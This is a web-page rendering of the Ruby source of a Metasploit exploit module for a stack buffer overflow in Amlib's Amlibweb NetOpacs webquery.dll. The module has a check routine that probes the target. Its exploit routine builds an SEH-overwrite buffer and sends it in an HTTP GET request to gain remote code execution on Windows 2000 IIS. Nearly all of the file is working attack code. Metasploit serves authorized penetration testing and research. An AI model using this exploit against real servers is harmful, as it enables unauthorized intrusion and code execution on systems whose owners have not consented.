Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/amlibweb_webquerydll_app.rb
25176 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Amlibweb NetOpacs webquery.dll Stack Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in Amlib's Amlibweb

19
          Library Management System (NetOpacs). The webquery.dll

20
          API is available through IIS requests. By specifying

21
          an overly long string to the 'app' parameter, SeH can be

22
          reliably overwritten allowing for arbitrary remote code execution.

23
          In addition, it is possible to overwrite EIP by specifying

24
          an arbitrary parameter name with an '=' terminator.

25
        },

26
        'Author' => [ 'aushack' ],

27
        'Arch' => [ ARCH_X86 ],

28
        'License' => MSF_LICENSE,

29
        'References' => [

30
          [ 'CVE', '2010-20112' ],

31
          [ 'OSVDB', '66814' ],

32
          [ 'BID', '42293' ],

33
          [ 'URL', 'http://www.aushack.com/advisories/' ],

34
        ],

35
        'Privileged'	=> true,

36
        'DefaultOptions' => {

37
          'EXITFUNC'	=> 'thread',

38
          'AllowWin32SEH' => true

39
        },

40
        'Payload' => {

41
          # 'Space'			=> 600,

42
          'BadChars' => "\x00\x0a\x0d\x20%=?\x2f\x5c\x3a\x3d\@;!$",

43
          'EncoderType'	=> Msf::Encoder::Type::AlphanumMixed,

44
          'DisableNops' => true,

45
          'StackAdjustment' => -3500,

46
        },

47
        'Platform' => ['win'],

48
        'Targets' => [

49
          # aushack - Tested OK 20100803 w2k IIS5

50
          [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5

51
          # [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.

52
        ],

53
        'DisclosureDate' => '2010-08-03', # 0day

54
        'DefaultTarget' => 0,

55
        'Notes' => {

56
          'Reliability' => UNKNOWN_RELIABILITY,

57
          'Stability' => UNKNOWN_STABILITY,

58
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

59
        }

60
      )

61
    )

62


63
    register_options(

64
      [

65
        Opt::RPORT(80),

66
      ]

67
    )

68
  end

69


70
  def check

71
    connect

72


73
    rand = Rex::Text.rand_text_alpha(10)

74


75
    sock.put("GET /amlibweb/webquery.dll?#{rand}= HTTP/1.0\r\n\r\n")

76
    res = sock.get_once

77
    disconnect

78


79
    if (res.to_s =~ /<H1>BAD REQUEST<\/H1><P>Your client sent a request that this server didn't understand.<br>Request:\s(\w+)/)

80
      if ($1 == rand)

81
        return Exploit::CheckCode::Vulnerable

82
      end

83
    end

84
    Exploit::CheckCode::Safe

85
  end

86


87
  def exploit

88
    connect

89
    seh = generate_seh_payload(target.ret)

90


91
    buffer = Rex::Text.rand_text_alphanumeric(3028) + seh

92
    sploit = "GET /amlibweb/webquery.dll?app=" + buffer + " HTTP/1.0\r\n"

93
    sock.put(sploit + "\r\n\r\n")

94


95
    handler

96
    disconnect

97
  end

98
end

99


100